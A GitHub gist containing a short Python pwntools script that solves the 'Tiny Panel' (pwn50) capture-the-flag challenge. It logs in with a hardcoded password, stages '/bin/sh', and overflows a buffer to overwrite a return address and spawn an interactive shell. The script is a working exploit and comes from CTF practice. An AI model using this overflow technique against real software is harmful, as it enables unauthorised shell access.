Skip to content

Instantly share code, notes, and snippets.

@rookuu

rookuu/pwn50-solve.py

Created December 4, 2017 10:27
Show Gist options
  • Save rookuu/8b18dbf13095e66e5af88502d6fee7ed to your computer and use it in GitHub Desktop.
Save rookuu/8b18dbf13095e66e5af88502d6fee7ed to your computer and use it in GitHub Desktop.
Download ZIP
Solution to lse.epitas.fr Tiny Panel (pwn50)
Raw
pwn50-solve.py
# Solution to lse.epitas.fr Tiny Panel (pwn50)
# Author: Luke Roberts (@rookuu)
# Date: 04/12/2017
p = process('./pwn50')
# Login to system
p.recv()
p.sendline('admin')
p.recv()
p.sendline('T6OBSh2i')
# Prep our ExecCmd function
p.recv()
p.sendline('1')
p.recv()
p.sendline('/bin/sh')
# Hop back to the system call, bypassing the check.
p.recv()
p.sendline('A'*0x58 + p64(0x0040084a))
p.recv()
p.sendline('3')
# Shellz
p.interactive()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment